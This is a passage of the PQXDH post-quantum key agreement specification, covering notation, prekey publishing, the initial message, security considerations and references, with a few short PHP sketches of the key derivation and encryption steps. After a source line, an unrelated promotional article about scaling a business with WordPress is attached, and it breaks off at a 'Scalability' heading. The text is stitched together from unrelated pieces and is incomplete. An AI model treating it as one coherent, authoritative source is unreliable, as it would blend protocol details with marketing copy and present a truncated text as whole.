Throughout this document, all public keys have a corresponding private key, but to simplify descriptions we will identify key pairs by the public key and assume that the corresponding private key can be accessed by the key owner.

This document will use the following notation:

  • The concatenation of byte sequences X and Y is X || Y.
  • DH(PK1, PK2) represents a byte sequence which is the shared secret output from an Elliptic Curve Diffie-Hellman function involving the key pairs represented by public keys PK1 and PK2. The Elliptic Curve Diffie-Hellman function will be either the X25519 or X448 function from [3], depending on the curve parameter.
  • Sig(PK, M, Z) represents the byte sequence that is a curve XEdDSA signature on the byte sequence M which was created by signing M with PK’s corresponding private key and using 64 bytes of randomness Z. This signature verifies with public key PK. The signing and verification functions for XEdDSA are specified in [1].
  • KDF(KM) represents 32 bytes of output from the HKDF algorithm [4] using hash with the following inputs (a minimal, non-normative sketch of this construction appears after this list):
    • HKDF input key material = F || KM, where KM is an input byte sequence containing secret key material, and F is a byte sequence containing 32 0xFF bytes if curve is curve25519, and 57 0xFF bytes if curve is curve448. As in XEdDSA [1], F ensures that the first bits of the HKDF input key material are never a valid encoding of a scalar or elliptic curve point.
    • HKDF salt = A zero-filled byte sequence with length equal to the hash output length, in bytes.
    • HKDF info = The concatenation of string representations of the 4 PQXDH parameters info, curve, hash, and pqkem into a single string separated with ‘_’ such as “MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024”. The string representations of the PQXDH parameters are defined by the implementer.
  • (CT, SS) = PQKEM-ENC(PK) represents a tuple of the byte sequence that is the KEM ciphertext, CT, output by the algorithm pqkem together with the shared secret byte sequence SS encapsulated by the ciphertext using the public key PK.
  • PQKEM-DEC(PK, CT) represents the shared secret byte sequence SS decapsulated from a pqkem ciphertext using the private key counterpart of the public key PK used to encapsulate the ciphertext CT.
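
As a non-normative illustration, the sketch below implements KDF assuming curve25519 with SHA-512 and the example info string from Section 2.1, using PHP's built-in hash_hkdf(); it is not a reference implementation.

    <?php
    // Non-normative sketch of KDF(KM), assuming curve25519 and SHA-512.
    function pqxdh_kdf(string $km): string
    {
        $f    = str_repeat("\xFF", 32);   // 32 0xFF bytes because curve is curve25519
        $salt = str_repeat("\x00", 64);   // zero-filled, SHA-512 output length in bytes
        $info = "MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024"; // example only
        return hash_hkdf("sha512", $f . $km, 32, $info, $salt);      // 32 bytes of output
    }
    ?>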

2.3. Roles

The PQXDH protocol involves three parties: Alice, Bob, and a server.

  • Alice wants to send Bob some initial data using encryption, and also establish a shared secret key which may be used for bidirectional communication.
  • Bob wants to allow parties like Alice to establish a shared key with him and send encrypted data. However, Bob might be offline when Alice attempts to do this. To enable this, Bob has a relationship with some server.
  • The server can store messages from Alice to Bob which Bob can later retrieve. The server also lets Bob publish some data which the server will provide to parties like Alice. The amount of trust placed in the server is discussed in Section 4.9.

In some systems the server role might be divided between multiple entities, but for simplicity we assume a single server that provides the above functions for Alice and Bob.

2.4. Elliptic Curve Keys

PQXDH uses the following elliptic curve public keys:

Name                   Definition
IKA                    Alice's identity key
IKB                    Bob's identity key
EKA                    Alice's ephemeral key
SPKB                   Bob's signed prekey
(OPKB1, OPKB2, …)      Bob's set of one-time prekeys

The elliptic curve public keys used within a PQXDH protocol run must either all be in curve25519 form, or they must all be in curve448 form, depending on the curve parameter [3].

Each party has a long-term identity elliptic curve public key (IKA for Alice, IKB for Bob).

Bob also has a signed prekey SPKB, which he changes periodically and signs each time with IKB, and a set of one-time prekeys (OPKB1, OPKB2, …), which are each used in a single PQXDH protocol run. (“Prekeys” are so named because they are essentially protocol messages which Bob publishes to the server prior to Alice beginning the protocol run.) These keys will be uploaded to the server as described in Section 3.2.

During each protocol run, Alice generates a new ephemeral key pair with public key EKA.

2.5. Post-Quantum Key Encapsulation Keys

PQXDH uses the following post-quantum key encapsulation public keys:

Name                      Definition
PQSPKB                    Bob's signed last-resort pqkem prekey
(PQOPKB1, PQOPKB2, …)     Bob's set of signed one-time pqkem prekeys

The pqkem public keys used within a PQXDH protocol run must all use the same pqkem parameter.

Bob has a signed last-resort post-quantum prekey PQSPKB, which he changes periodically and signs each time with IKB, and a set of signed one-time prekeys (PQOPKB1, PQOPKB2, …) which are also signed with IKB and each used in a single PQXDH protocol run. These keys will be uploaded to the server as described in Section 3.2. The name “last-resort” refers to the fact that the last-resort prekey is only used when one-time pqkem prekeys are not available. This can happen when the number of prekey bundles downloaded for Bob exceeds the number of one-time pqkem prekeys Bob has uploaded (see Section 3 for details about the role of the server).

3. The PQXDH protocol

3.1. Overview

PQXDH has three phases:

  1. Bob publishes his elliptic curve identity key, elliptic curve prekeys, and pqkem prekeys to a server.
  2. Alice fetches a “prekey bundle” from the server, and uses it to send an initial message to Bob.
  3. Bob receives and processes Alice’s initial message.

The following sections explain these phases.

3.2. Publishing keys

Bob generates a sequence of 64-byte random values ZSPK, ZPQSPK, Z1, Z2, … and publishes a set of keys to the server containing:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • Bob’s signed last-resort pqkem prekey PQSPKB
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQSPKB), ZPQSPK)
  • A set of Bob’s one-time curve prekeys (OPKB1, OPKB2, OPKB3, …)
  • A set of Bob’s signed one-time pqkem prekeys (PQOPKB1, PQOPKB2, PQOPKB3, …)
  • The set of Bob’s signatures on the signed one-time pqkem prekeys (Sig(IKB, EncodeKEM(PQOPKB1), Z1), Sig(IKB, EncodeKEM(PQOPKB2), Z2), Sig(IKB, EncodeKEM(PQOPKB3), Z3), …)

Bob only needs to upload his identity key to the server once. However, Bob may upload new one-time prekeys at other times (e.g. when the server informs Bob that the server’s store of one-time prekeys is getting low).

For both the signed curve prekey and the signed last-resort pqkem prekey, Bob will upload a new prekey along with its signature using IKB at some interval (e.g. once a week or once a month). The new signed prekey and its signatures will replace the previous values.

After uploading a new pair of signed curve and signed last-resort pqkem prekeys, Bob may keep the private key corresponding to the previous pair around for some period of time to handle messages using it that may have been delayed in transit. Eventually, Bob should delete this private key for forward secrecy (one-time prekey private keys will be deleted as Bob receives messages using them; see Section 3.4).

3.3. Sending the initial message

To perform a PQXDH key agreement with Bob, Alice contacts the server and fetches a “prekey bundle” containing the following values:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • One of either Bob’s signed one-time pqkem prekey PQOPKBn or Bob’s last-resort signed pqkem prekey PQSPKB if no signed one-time pqkem prekey remains. Call this key PQPKB.
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQPKB), ZPQPK)
  • (Optionally) Bob’s one-time curve prekey OPKBn

The server should provide one of Bob’s curve one-time prekeys if one exists and then delete it. If all of Bob’s curve one-time prekeys on the server have been deleted, the bundle will not contain a one-time curve prekey element.

The server should prefer to provide one of Bob’s pqkem one-time signed prekeys PQOPKBn if one exists and then delete it. If all of Bob’s pqkem one-time signed prekeys on the server have been deleted, the bundle will instead contain Bob’s pqkem last-resort signed prekey PQSPKB.

Alice verifies the signatures on the prekeys. If any signature check fails, Alice aborts the protocol. Otherwise, if all signature checks pass, Alice then generates an ephemeral curve key pair with public key EKA. Alice additionally generates a pqkem encapsulated shared secret:

    (CT, SS) = PQKEM-ENC(PQPKB)
               shared secret SS
               ciphertext CT

If the bundle does not contain a curve one-time prekey, she calculates:

    DH1 = DH(IKA, SPKB)
    DH2 = DH(EKA, IKB)
    DH3 = DH(EKA, SPKB)
    SK = KDF(DH1 || DH2 || DH3 || SS)

If the bundle does contain a curve one-time prekey, the calculation is modified to include an additional DH:

    DH4 = DH(EKA, OPKB)
    SK = KDF(DH1 || DH2 || DH3 || DH4 || SS)
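
As a non-normative illustration of these calculations on Alice's side, the sketch below uses libsodium's X25519 function and the pqxdh_kdf() sketch from Section 2.2; all variable names are hypothetical, and SS is assumed to come from whatever pqkem library the application uses.

    <?php
    // Non-normative sketch of Alice's derivation of SK (names are hypothetical).
    function derive_sk(
        string $ik_a_priv, string $ek_a_priv,   // Alice's identity and ephemeral private keys
        string $ik_b_pub, string $spk_b_pub,    // Bob's identity key and signed prekey
        ?string $opk_b_pub, string $ss          // optional one-time prekey, KEM shared secret
    ): string {
        $dh1 = sodium_crypto_scalarmult($ik_a_priv, $spk_b_pub); // DH(IKA, SPKB)
        $dh2 = sodium_crypto_scalarmult($ek_a_priv, $ik_b_pub);  // DH(EKA, IKB)
        $dh3 = sodium_crypto_scalarmult($ek_a_priv, $spk_b_pub); // DH(EKA, SPKB)
        $km  = $dh1 . $dh2 . $dh3;
        if ($opk_b_pub !== null) {
            $km .= sodium_crypto_scalarmult($ek_a_priv, $opk_b_pub); // DH4 = DH(EKA, OPKB)
        }
        return pqxdh_kdf($km . $ss); // SK = KDF(DH1 || DH2 || DH3 [|| DH4] || SS)
    }
    ?>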

After calculating SK, Alice deletes her ephemeral private key, the DH outputs, the shared secret SS, and the ciphertext CT.

Alice then calculates an “associated data” byte sequence AD that contains identity information for both parties:

    AD = EncodeEC(IKA) || EncodeEC(IKB)

Alice may optionally append additional information to AD, such as Alice and Bob’s usernames, certificates, or other identifying information.

Alice then sends Bob an initial message containing:

  • Alice’s identity key IKA
  • Alice’s ephemeral key EKA
  • The pqkem ciphertext CT encapsulating SS for PQPKB
  • Identifiers stating which of Bob’s prekeys Alice used
  • An initial ciphertext encrypted with some AEAD encryption scheme [5] using AD as associated data and using an encryption key which is either SK or the output from some cryptographic PRF keyed by SK.

The initial ciphertext is typically the first message in some post-PQXDH communication protocol. In other words, this ciphertext typically has two roles, serving as the first message within some post-PQXDH protocol, and as part of Alice’s PQXDH initial message.
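
As a non-normative illustration of the AEAD step only, the following sketch uses libsodium's XChaCha20-Poly1305 with SK used directly as the 32-byte key and AD = EncodeEC(IKA) || EncodeEC(IKB) passed as associated data; a real post-PQXDH protocol would typically derive its message keys from SK and define its own nonce handling.

    <?php
    // Non-normative sketch: AEAD-encrypt Alice's first message under SK, binding in AD.
    function encrypt_initial_message(string $sk, string $ad, string $first_message): array
    {
        $nonce = random_bytes(SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES);
        $ct = sodium_crypto_aead_xchacha20poly1305_ietf_encrypt($first_message, $ad, $nonce, $sk);
        return [$nonce, $ct];   // the nonce must be transmitted alongside the ciphertext
    }
    ?>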

The initial message must be encoded in an unambiguous format to avoid confusion of the message items by the recipient.

After sending this, Alice may continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Bob, subject to the security considerations discussed in Section 4.

3.4. Receiving the initial message

Upon receiving Alice’s initial message, Bob retrieves Alice’s identity key and ephemeral key from the message. Bob also loads his identity private key and the private key(s) corresponding to the signed prekeys and one-time prekeys Alice used.

Using these keys, Bob calculates PQKEM-DEC(PQPKB, CT) as the shared secret SS and repeats the DH and KDF calculations from the previous section to derive SK, and then deletes the DH values and SS values.

Bob then constructs the AD byte sequence using IKA and IKB as described in the previous section. Finally, Bob attempts to decrypt the initial ciphertext using SK and AD. If the initial ciphertext fails to decrypt, then Bob aborts the protocol and deletes SK.

If the initial ciphertext decrypts successfully, the protocol is complete for Bob. For forward secrecy, Bob deletes the ciphertext and any one-time prekey private key that was used. Bob may then continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Alice subject to the security considerations discussed in Section 4.

4. Security considerations

The security of the composition of X3DH [6] with the Double Ratchet [7] was formally studied in [8] and proven secure under the Gap Diffie-Hellman assumption (GDH) [9]. PQXDH composed with the Double Ratchet retains this security against an adversary without access to a quantum computer, but strengthens the security of the initial handshake to require the solution of both GDH and Module-LWE [10]. The remainder of this section discusses an incomplete list of further security considerations.

4.1. Authentication

Before or after a PQXDH key agreement, the parties may compare their identity public keys IKA and IKB through some authenticated channel. For example, they may compare public key fingerprints manually, or by scanning a QR code. Methods for doing this are outside the scope of this document.

Authentication in PQXDH is not quantum-secure. In the presence of an active quantum adversary, the parties receive no cryptographic guarantees as to who they are communicating with. Post-quantum secure deniable mutual authentication is an open research problem which we hope to address with a future revision of this protocol.

If authentication is not performed, the parties receive no cryptographic guarantee as to who they are communicating with.

4.2. Protocol replay

If Alice’s initial message doesn’t use a one-time prekey, it may be replayed to Bob and he will accept it. This could cause Bob to think Alice had sent him the same message (or messages) repeatedly.

To mitigate this, a post-PQXDH protocol may wish to quickly negotiate a new encryption key for Alice based on fresh random input from Bob. This is the typical behavior of Diffie-Hellman-based ratcheting protocols [7].

Bob could attempt other mitigations, such as maintaining a blacklist of observed messages, or replacing old signed prekeys more rapidly. Analyzing these mitigations is beyond the scope of this document.

4.3. Replay and key reuse

Another consequence of the replays discussed in the previous section is that a successfully replayed initial message would cause Bob to derive the same SK in different protocol runs.

For this reason, any post-PQXDH protocol that uses SK to derive encryption keys MUST take measures to prevent catastrophic key reuse. For example, Bob could use a DH-based ratcheting protocol to combine SK with a freshly generated DH output to get a randomized encryption key [7].

4.4. Deniability

Informally, cryptographic deniability means that a protocol neither gives its participants a publishable cryptographic proof of the contents of their communication nor proof of the fact that they communicated. PQXDH, like X3DH, aims to provide both Alice and Bob deniability that they communicated with each other in a context where a “judge” who may have access to one or more parties’ secret keys is presented with a transcript allegedly created by communication between Alice and Bob.

We focus on offline deniability because if either party is collaborating with a third party during protocol execution, they will be able to provide proof of their communication to such a third party. This limitation on “online” deniability appears to be intrinsic to the asynchronous setting [11].

PQXDH has some forms of cryptographic deniability. Motivated by the goals of X3DH, Brendel et al. [12] introduce a notion of 1-out-of-2 deniability for semi-honest parties and a “big brother” judge with access to all parties’ secret keys. Since either Alice or Bob can create a fake transcript using only their own secret keys, PQXDH has this deniability property. Vatandas, et al. [13] prove that X3DH is deniable in a different sense subject to certain “Knowledge of Diffie-Hellman Assumptions”. PQXDH is deniable in this sense for Alice, subject to the same assumptions, and we conjecture that it is deniable for Bob subject to an additional Plaintext Awareness (PA) assumption for pqkem. We note that Kyber uses a variant of the Fujisaki-Okamoto transform with implicit rejection [14] and is therefore not PA as is. However, in PQXDH, an AEAD ciphertext encrypted with the session key is always sent along with the Kyber ciphertext. This should offer the same guarantees as PA. We encourage the community to investigate the precise deniability properties of PQXDH.

These assertions all pertain to deniability in the classical setting. As discussed in [15] we expect that for future revisions of this protocol (that provide post-quantum mutual authentication) assertions about deniability against semi-honest quantum adversaries will hold. Deniability in the face of malicious quantum adversaries requires further research.

4.5. Signatures

It might be tempting to omit the prekey signature after observing that mutual authentication and forward secrecy are achieved by the DH calculations. However, this would allow a “weak forward secrecy” attack: A malicious server could provide Alice a prekey bundle with forged prekeys, and later compromise Bob’s IKB to calculate SK.

Alternatively, it might be tempting to replace the DH-based mutual authentication (i.e. DH1 and DH2) with signatures from the identity keys. However, this reduces deniability, increases the size of initial messages, and increases the damage done if ephemeral or prekey private keys are compromised, or if the signature scheme is broken.

4.6. Key compromise

Compromise of a party’s private keys has a disastrous effect on security, though the use of ephemeral keys and prekeys provides some mitigation.

Compromise of a party’s identity private key allows impersonation of that party to others. Compromise of a party’s prekey private keys may affect the security of older or newer SK values, depending on many considerations.

A full analysis of all possible compromise scenarios is outside the scope of this document, however a partial analysis of some plausible scenarios is below:

  • If either an elliptic curve one-time prekey (OPKB) or a post-quantum key encapsulation one-time prekey (PQOPKB) are used for a protocol run and deleted as specified, then a compromise of Bob’s identity key and prekey private keys at some future time will not compromise the older SK.
  • If one-time prekeys were not used for a protocol run, then a compromise of the private keys for IKB, SPKB, and PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].
  • Compromise of prekey private keys may enable attacks that extend into the future, such as passive calculation of SK values, and impersonation of arbitrary other parties to the compromised party (“key-compromise impersonation”). These attacks are possible until the compromised party replaces his compromised prekeys on the server (in the case of passive attack); or deletes his compromised signed prekey’s private key (in the case of key-compromise impersonation).

4.7. Passive quantum adversaries

PQXDH is designed to prevent “harvest now, decrypt later” attacks by adversaries with access to a quantum computer capable of computing discrete logarithms in curve.

  • If an attacker has recorded the public information and the message from Alice to Bob, even access to a quantum computer will not compromise SK.
  • If a post-quantum key encapsulation one-time prekey (PQOPKB) is used for a protocol run and deleted as specified then compromise after deletion and access to a quantum computer at some future time will not compromise the older SK.
  • If post-quantum one-time prekeys were not used for a protocol run, then access to a quantum computer and a compromise of the private key for PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].

4.8. Active quantum adversaries

PQXDH is not designed to provide protection against active quantum attackers. An active attacker with access to a quantum computer capable of computing discrete logarithms in curve can compute DH(PK1, PK2) and Sig(PK, M, Z) for all elliptic curve keys PK1, PK2, and PK. This allows an attacker to impersonate Alice by using the quantum computer to compute the secret key corresponding to PKA then continuing with the protocol. A malicious server with access to such a quantum computer could impersonate Bob by generating new key pairs PQSPK’B and PQOPK’B, computing the secret key corresponding to PKB, then using PKB to sign the newly generated post-quantum KEM keys and delivering these attacker-generated keys in place of Bob’s post-quantum KEM key when Alice requests a prekey bundle.

It is tempting to consider adding a post-quantum identity key that Bob could use to sign the post-quantum prekeys. This would prevent the malicious server attack described above and provide Alice a cryptographic guarantee that she is communicating with Bob, but it does not provide mutual authentication. Bob does not have any cryptographic guarantee about who he is communicating with. The post-quantum KEM and signature schemes being standardized by NIST [16] do not provide a mechanism for post-quantum deniable mutual authentication, although this can be achieved through the use of a post-quantum ring signature or designated verifier signature [12][15]. We urge the community to work toward standardization of these or other mechanisms that will allow deniable mutual authentication.

4.9. Server trust

A malicious server could cause communication between Alice and Bob to fail (e.g. by refusing to deliver messages).

If Alice and Bob authenticate each other as in Section 4.1, then the only additional attack available to the server is to refuse to hand out one-time prekeys, causing forward secrecy for SK to depend on the signed prekey’s lifetime (as analyzed in Section 4.6).

This reduction in initial forward secrecy could also happen if one party maliciously drains another party’s one-time prekeys, so the server should attempt to prevent this (e.g. with rate limits on fetching prekey bundles).

4.10. Identity binding

Authentication as in Section 4.1 does not necessarily prevent an “identity misbinding” or “unknown key share” attack.

This results when an attacker (“Charlie”) falsely presents Bob’s identity key fingerprint to Alice as his (Charlie’s) own, and then either forwards Alice’s initial message to Bob, or falsely presents Bob’s contact information as his own. The effect of this is that Alice thinks she is sending an initial message to Charlie when she is actually sending it to Bob.

To make this more difficult the parties can include more identifying information into AD, or hash more identifying information into the fingerprint, such as usernames, phone numbers, real names, or other identifying information. Charlie would be forced to lie about these additional values, which might be difficult.

However, there is no way to reliably prevent Charlie from lying about additional values, and including more identity information into the protocol often brings trade-offs in terms of privacy, flexibility, and user interface. A detailed analysis of these trade-offs is beyond the scope of this document.

4.11. Risks of weak randomness sources

In addition to concerns about the generation of the keys themselves, the security of the PQKEM shared secret relies on the random source available to Alice’s machine at the time of running the PQKEM-ENC operation. This leads to a situation similar to what we face with a Diffie-Hellman exchange. For both Diffie-Hellman and Kyber, if Alice has weak entropy then the resulting shared secret will have low entropy when conditioned on Bob’s public key. Thus both the classical and post-quantum security of SK depend on the strength of Alice’s random source.

Kyber hashes Bob’s public key with Alice’s random bits to generate the shared secret, making Bob’s key contributory, as it is with a Diffie-Hellman key exchange. This does not reduce the dependence on Alice’s entropy source, as described above, but it does limit Alice’s ability to control the post-quantum shared secret. Not all KEMs make Bob’s key contributory and this is a property to consider when selecting pqkem.

5. IPR

This document is hereby placed in the public domain.

6. Acknowledgements

The PQXDH protocol was developed by Ehren Kret and Rolfe Schmidt as an extension of the X3DH protocol [6] by Moxie Marlinspike and Trevor Perrin. Thanks to Trevor Perrin for discussions on the design of this protocol.

Thanks to Bas Westerbaan, Chris Peikert, Daniel Collins, Deirdre Connolly, John Schanck, Jon Millican, Jordan Rose, Karthik Bhargavan, Loïs Huguenin-Dumittan, Peter Schwabe, Rune Fiedler, Shuichi Katsumata, Sofía Celi, and Yo’av Rieck for helpful discussions and editorial feedback.

Thanks to the Kyber team [17] for their work on the Kyber key encapsulation mechanism.

7. References

[1]

T. Perrin, “The XEdDSA and VXEdDSA Signature Schemes,” 2016. https://signal.org/docs/specifications/xeddsa/

[2]

“Module-lattice-based key-encapsulation mechanism standard.” https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.203.ipd.pdf

[3]

A. Langley, M. Hamburg, and S. Turner, “Elliptic Curves for Security.” Internet Engineering Task Force; RFC 7748 (Informational); IETF, Jan-2016. http://www.ietf.org/rfc/rfc7748.txt

[4]

H. Krawczyk and P. Eronen, “HMAC-based Extract-and-Expand Key Derivation Function (HKDF).” Internet Engineering Task Force; RFC 5869 (Informational); IETF, May-2010. http://www.ietf.org/rfc/rfc5869.txt

[5]

P. Rogaway, “Authenticated-encryption with Associated-data,” in Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002. http://web.cs.ucdavis.edu/~rogaway/papers/ad.pdf

[6]

M. Marlinspike and T. Perrin, “The X3DH Key Agreement Protocol,” 2016. https://signal.org/docs/specifications/x3dh/

[7]

T. Perrin and M. Marlinspike, “The Double Ratchet Algorithm,” 2016. https://signal.org/docs/specifications/doubleratchet/

[8]

K. Cohn-Gordon, C. Cremers, B. Dowling, L. Garratt, and D. Stebila, “A formal security analysis of the signal messaging protocol,” J. Cryptol., vol. 33, no. 4, 2020. https://doi.org/10.1007/s00145-020-09360-1

[9]

T. Okamoto and D. Pointcheval, “The gap-problems: A new class of problems for the security of cryptographic schemes,” in Proceedings of the 4th international workshop on practice and theory in public key cryptography: Public key cryptography, 2001.

[10]

A. Langlois and D. Stehlé, “Worst-case to average-case reductions for module lattices,” Des. Codes Cryptography, vol. 75, no. 3, Jun. 2015. https://doi.org/10.1007/s10623-014-9938-4

[11]

N. Unger and I. Goldberg, “Deniable Key Exchanges for Secure Messaging,” in Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015. https://cypherpunks.ca/~iang/pubs/dake-ccs15.pdf

[12]

J. Brendel, R. Fiedler, F. Günther, C. Janson, and D. Stebila, “Post-quantum asynchronous deniable key exchange and the Signal handshake,” in Public-Key Cryptography – PKC 2022 – 25th IACR International Conference on Practice and Theory of Public-Key Cryptography, virtual event, March 8-11, 2022, proceedings, part II, 2022, vol. 13178. https://doi.org/10.1007/978-3-030-97131-1_1

[13]

N. Vatandas, R. Gennaro, B. Ithurburn, and H. Krawczyk, “On the cryptographic deniability of the Signal protocol,” in Applied Cryptography and Network Security – 18th International Conference, ACNS 2020, Rome, Italy, October 19-22, 2020, proceedings, part II, 2020, vol. 12147. https://doi.org/10.1007/978-3-030-57878-7_10

[14]

D. Hofheinz, K. Hövelmanns, and E. Kiltz, “A modular analysis of the Fujisaki-Okamoto transformation,” in Theory of Cryptography – 15th International Conference, TCC 2017, Baltimore, MD, USA, November 12-15, 2017, proceedings, part I, 2017, vol. 10677. https://doi.org/10.1007/978-3-319-70500-2_12

[15]

K. Hashimoto, S. Katsumata, K. Kwiatkowski, and T. Prest, “An efficient and generic construction for signal’s handshake (X3DH): Post-quantum, state leakage secure, and deniable,” J. Cryptol., vol. 35, no. 3, 2022. https://doi.org/10.1007/s00145-022-09427-1

[16]

NIST, “Post-quantum cryptography.” https://csrc.nist.gov/Projects/post-quantum-cryptography

[17]

“Kyber key encapsulation mechanism.” https://pq-crystals.org/kyber/

Source :
https://signal.org/docs/specifications/pqxdh/

How WordPress Can Help Scale Your Business

SEPTEMBER 12, 2023 BY PAUL G.

Having a robust online presence is not just an option but a necessity for businesses looking to scale. While there are numerous platforms that offer varying degrees of customization and functionality, WordPress stands out as a versatile Content Management System (CMS) that transcends its initial design as a platform for bloggers. WordPress has evolved into an incredibly powerful tool that can assist in the growth and management of your business, whether you’re a start-up or an established enterprise.

From its SEO capabilities to its eCommerce solutions, WordPress offers a range of features designed to make your business more efficient, reachable, and scalable. This article will delve into the multiple ways WordPress can be your business’s best friend, helping you navigate the complex maze of scaling effectively. So, if you’re contemplating how to take your business to the next level without getting tangled in the complexities of coding or spending a fortune, read on.

Why Choose WordPress for Business

When it comes to setting up and managing an online business, the platform you choose serves as the backbone of your operations. WordPress emerges as a leading choice for several compelling reasons:

1. Open-Source Platform With a Large Community
One of the most appealing aspects of WordPress is that it’s an open-source platform, meaning you have the freedom to customize and modify your website as you see fit. This also means that there is a large community of developers continually contributing to its improvement. You’re never alone when you have a problem; chances are someone else has faced the same issue and found a solution that they’ve shared.

2. High Level of Customization and Scalability
WordPress offers an almost limitless array of customization options. With thousands of themes and plugins available, you can tailor the appearance and functionality of your website to perfectly match your brand and business objectives. This high degree of customization extends to supporting different currencies, enabling you to appeal to an international customer base effortlessly.

3. User-Friendly Interface
WordPress is designed to be used by people who may not have any coding experience. The platform is intuitive, making it easy to add content, make updates, and manage various aspects of your site without needing specialized technical knowledge.

4. SEO Capabilities
Search engine optimization (SEO) is critical for any business aiming for long-term success. WordPress is coded to be SEO-friendly right out of the box. Additionally, there are several SEO plugins available that can help you optimize your content and improve your rankings further.

5. Cost-Effective
Starting a website with WordPress can be incredibly cost-efficient. The platform itself is free, and many high-quality themes and plugins are available at no cost. While there may be some expenses, such as for specialized plugins or a more premium hosting service, these costs are generally lower compared to developing a custom website from scratch.

6. eCommerce Ready
For businesses looking to sell products or services online, WordPress seamlessly integrates with eCommerce solutions like WooCommerce. This allows for easy inventory management, payment gateway integration, and functionalities like printing shipping labels directly from your dashboard.

By choosing WordPress as your business platform, you’re not just creating a website—you’re building a scalable, customizable, and efficient business operation that can grow with you. With its blend of user-friendly design, SEO capabilities, and versatile functionality, WordPress proves to be a strong ally in achieving your business goals. Keep reading as we delve into these aspects in greater detail, starting with the platform’s unmatched flexibility and customization options.

Flexibility and Customization

One of the most significant advantages of using WordPress is its unparalleled flexibility and customization options. Whether you’re in the healthcare sector, the food and beverage industry, or running an eCommerce store, WordPress has you covered. With its array of specialized themes and plugins tailored to business needs, you can establish a strong online presence that aligns with your brand and business goals.

Themes

Themes offer the first layer of customization. Designed specifically for various business sectors, they provide built-in functionalities like portfolios, customer testimonials, and eCommerce features. You can establish your visual brand identity effortlessly, without writing a single line of code.

Plugins

Plugins, meanwhile, are the true workhorses of WordPress customization. WordPress has tens of thousands of plugins in its directory, and these handy additions can add virtually any functionality you can imagine. Whether you need an appointment booking system, a members-only section, or automated marketing solutions, there’s a plugin for that. Some plugins even allow you to handle multiple currencies, making your website more accommodating for international customers.

By combining the right themes and plugins, WordPress allows you unparalleled control over how your website looks and functions. This isn’t just advantageous for you as the business owner; it also dramatically enhances the user experience. Your customers can interact with a platform that is both visually appealing and highly functional, meeting their needs no matter where they are in the world or what currency they prefer to use.

Security

Having a secure website is a non-negotiable for businesses. Luckily, WordPress takes security seriously and offers a multitude of features to help you protect your online assets. For starters, the platform releases regular updates to address known security vulnerabilities, ensuring that you are always running the most secure version possible.

Change reporting is another powerful feature provided by WordPress security plugins, allowing you to monitor real-time changes on your site. Any unauthorized modifications can trigger alerts, enabling you to take quick action. Additionally, many plugins offer malware scanning, which continuously scans your site’s files to detect malicious code and potential threats.

Intrusion prevention mechanisms are also commonly found in WordPress security solutions. These tools can block suspicious IP addresses, limit login attempts, and even implement two-factor authentication to add an extra layer of protection to your site.

While no system can guarantee 100% security, WordPress comes close by offering a range of robust features that work together to minimize risks. By taking advantage of these tools, you’re not just protecting your website; you’re safeguarding your business reputation and the trust of your customers. However, it’s crucial to remember that users also bear the responsibility for keeping themes and plugins updated, as outdated software can pose security risks.

SEO Capabilities

Visibility is crucial for any online business, and WordPress shines when it comes to search engine optimization (SEO). The platform is designed with built-in SEO features that allow for custom permalinks, meta descriptions, and image alt text, making it easier for search engines to read and index your site.

Additionally, SEO plugins like Yoast and All in One SEO can further enhance your optimization efforts. These plugins help you target specific keywords and improve content readability. Site speed, an important SEO factor, can be optimized by choosing a quality hosting service like HostDash.

WordPress themes are also generally responsive, adapting to various screen sizes, which is vital for mobile optimization—a significant factor in search rankings. Analytics plugins offer insights into your site’s performance, and local SEO can be easily managed for businesses operating in specific geographic locations.

Whether you want to target a global or local audience, WordPress has the tools and setup to help you achieve your specific SEO goals. By leveraging WordPress’s SEO features, you set the stage for better visibility, increased customer engagement, and, ultimately, business growth.

eCommerce Solutions

In today’s digital age, having an eCommerce capability is often essential for business growth. WordPress makes this transition smooth and simple. Through its seamless integration with WooCommerce and other eCommerce plugins, WordPress allows businesses to set up an online store effortlessly.

WooCommerce Integration

WooCommerce is the go-to eCommerce plugin for WordPress users, enabling a wide range of functionalities, from inventory management to payment gateway integration. The setup is straightforward, allowing even those with minimal technical expertise to launch an online store.

Payment and Currency Flexibility

One of the benefits of using WordPress for eCommerce is the range of payment options available. Whether your customers prefer credit card payments, PayPal, or digital wallets, WordPress has you covered. Some plugins even support transactions in multiple currencies, which is ideal for businesses looking to serve an international clientele.

Shipping Solutions

Shipping is a critical component of any eCommerce operation. WordPress simplifies this aspect as well, with options for calculating real-time shipping costs and even printing shipping labels directly from your dashboard.

Content Management

Managing content effectively is at the heart of any successful online business. WordPress makes this task simple and intuitive. Built originally as a blogging platform, WordPress has advanced content management capabilities that extend far beyond just text-based posts. It supports a wide range of media types, including images, videos, and audio files, allowing you to create a rich, multimedia experience for your visitors.

One of the standout features is the built-in editor, which provides a user-friendly interface for creating and formatting your content. This editor allows for real-time previews so you can see how changes will look before they go live. Beyond the visual aspects, WordPress enables easy content organization through categories, tags, and custom taxonomies. You can also schedule posts in advance, freeing you from having to manually update content and allowing you to focus on other aspects of your business.

Even more appealing is how WordPress content management intersects with other functionalities. You can easily link blog posts to specific products in your online store or incorporate SEO best practices directly into your content using plugins. All these features work in tandem to make your site not just a promotional tool, but a comprehensive platform for customer engagement and business growth.

Scalability

